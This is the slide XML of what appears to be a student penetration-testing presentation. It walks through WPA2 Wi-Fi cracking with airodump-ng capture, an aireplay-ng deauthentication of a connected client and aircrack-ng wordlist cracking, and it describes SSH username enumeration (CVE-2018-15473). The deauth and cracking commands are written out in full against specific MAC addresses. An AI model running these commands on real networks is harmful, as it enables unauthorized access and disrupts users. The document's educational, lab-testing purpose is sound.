      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1998194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B3050E-4F84-FE2E-8C78-CE2D361ACE4F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1751012" y="865974"/>
            <a:ext cx="8676222" cy="3643822"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="6600"/>
              <a:t>Wireless WPA2 cracking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="219170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3A-22DA-FE09-8465-2A48C4FBF558}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Check the adapter mode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA1EAF16-7571-A27F-37F7-C0EC42263D59}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1444207" y="2385827"/>
            <a:ext cx="5982535" cy="2657846"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2973146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6E7A-B59B-B7ED-58DD-B370EA6EF5F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Kill all the wireless processes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2BA48471-57BE-F9A5-B57F-E3C434C12579}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2787560" y="2694753"/>
            <a:ext cx="6141140" cy="2599623"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3548296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242" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="974179" y="714375"/>
            <a:ext cx="3332955" cy="5076826"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3400">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Project Specification</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10247" name="Rectangle 1024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Rectangle 1024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254" name="Straight Connector 10253">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sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4973046" y="714375"/>
            <a:ext cx="6253751" cy="5076825"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1500" i="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Requirements of the project</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Penetration Testing Tools</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: Use tools like Kali Linux, nmap, Nessus, Metasploit, and others to scan and exploit system vulnerabilities.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Automation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: Automate tasks using nmap scripting engine (NSE), Bash, and PowerShell scripts.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Custom Exploits</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: Create or modify exploits in languages like C, Python, or Perl to target specific vulnerabilities.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Network &amp; System Infrastructure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: Set up and test real or virtual network components (e.g., firewalls, wireless networks) and systems (e.g., Windows, Linux), without using pre-configured vulnerable machines.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exploiting Vulnerabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: Focus on a range of vulnerabilities, including OS flaws, misconfigured services, insecure applications, and web application vulnerabilities like SQL injection and XSS.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Countermeasures</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: Document and propose solutions for each vulnerability.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Technical Documentation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: Provide detailed documentation of testing, including network diagrams, scan results, and exploitation steps.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1500" i="1">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8B12-49B6-59FE-1E23-0B325AE7D526}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Change adapter to monitor mode.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{654F2029-D4D6-D010-C3C4-3AEBAC3FD592}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2632075" y="2667000"/>
            <a:ext cx="6924675" cy="3124200"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4242755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DCE4-6F91-4811-CE9A-26C95C4E18A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Check for the available networks.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D8DDE14-3CF5-1188-03AE-47B0E91189A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2683807" y="1888870"/>
            <a:ext cx="2905530" cy="724001"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC89F7DA-6633-C2E3-94FF-506583FDD0BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2725000" y="2756264"/>
            <a:ext cx="5728673" cy="3362482"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2820285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738E-7CDD-4450-27F4-452AF0941A6A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Check for the connections in the target network.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{721DFD1C-E172-751D-1D39-452E50B7FD76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>sudo airodump-ng --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bssid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 58:6D:8F:78:5C:DC -c 1  -w output wlan0mon</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6C1A926-E024-931D-3A85-CDEF4008BBB3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2752509" y="2199785"/>
            <a:ext cx="7335274" cy="1543265"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1869965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D4B1-AFD0-7CFF-5929-04A3BC6C1695}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="643192" y="668028"/>
            <a:ext cx="3431919" cy="5215247"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>Deauthenticate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> a connected user. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Also capture the network packets.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A412A130-BFAF-5654-701A-E40422FFF8C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4719485" y="668029"/>
            <a:ext cx="6828142" cy="3353365"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>sudo aireplay-ng --deauth 10000 -a 58:6D:8F:78:5C:DC -c E4:0D:36:0B:C3:5E wlan0mon</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{634BB73C-F7E9-F22D-7A0E-5B13397863D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4944578" y="2834216"/>
            <a:ext cx="5202721" cy="335575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03880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55AC-4241-BEF2-BB65-025B80A69B0A}"/>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Use aircrack-ng to crack the password.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0E31CFE-DA52-1D18-1CD1-C181B50CF1B5}"/>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sudo aircrack-ng -w /home/kali/Desktop/wordlist -b 58:6D:8F:78:5C:DC output-02.cap</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4BCAC288-6DBE-BD69-30C0-CB1684E76B6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4630994" y="1401489"/>
            <a:ext cx="6916633" cy="373498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50350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adlock on computer motherboard">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BDFDC06-D948-ACD9-82B1-F8AB328E3B92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:duotone>
              <a:prstClr val="black"/>
              <a:schemeClr val="bg1">
                <a:tint val="45000"/>
                <a:satMod val="400000"/>
              </a:schemeClr>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A8D8ACC-78B0-7035-BE52-C725FA4B228E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1751012" y="609601"/>
            <a:ext cx="8676222" cy="3200400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>SSH VULNERABILITY</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15779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DF458-11CB-9AEE-DC60-DB4194350D19}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="610292" y="383032"/>
            <a:ext cx="11007852" cy="1598168"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Nmap to find the open port and version</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37509CE2-8812-0217-C815-F3E7D697B960}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2645179" y="2517900"/>
            <a:ext cx="5963482" cy="2248214"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3924677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2F6-99D5-5516-B6D2-698DFFFD8E23}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="653716" y="-92399"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>Vulnerability</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99DB0E7F-1576-4B9B-1B78-F63A0A4F7DC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838199" y="1060702"/>
            <a:ext cx="10904621" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Username Enumeration (CVE-2018-15473):</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> This vulnerability affected OpenSSH versions up to 7.7. It allowed attackers to determine valid usernames on the target system by observing differences in the server's response time when presented with valid and invalid usernames. This information could then be used to perform targeted attacks, such as brute-forcing passwords for known accounts.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{881CD42D-4412-9937-B4A7-ED7E6E871DC8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="717882" y="4305157"/>
            <a:ext cx="11145253" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Timing Attacks:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> Attackers could exploit this vulnerability by sending SSH login requests with various usernames and measuring the server's response time. A slightly faster response for valid usernames compared to invalid ones could reveal valid accounts on the system.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 1">
            <a:extLst>
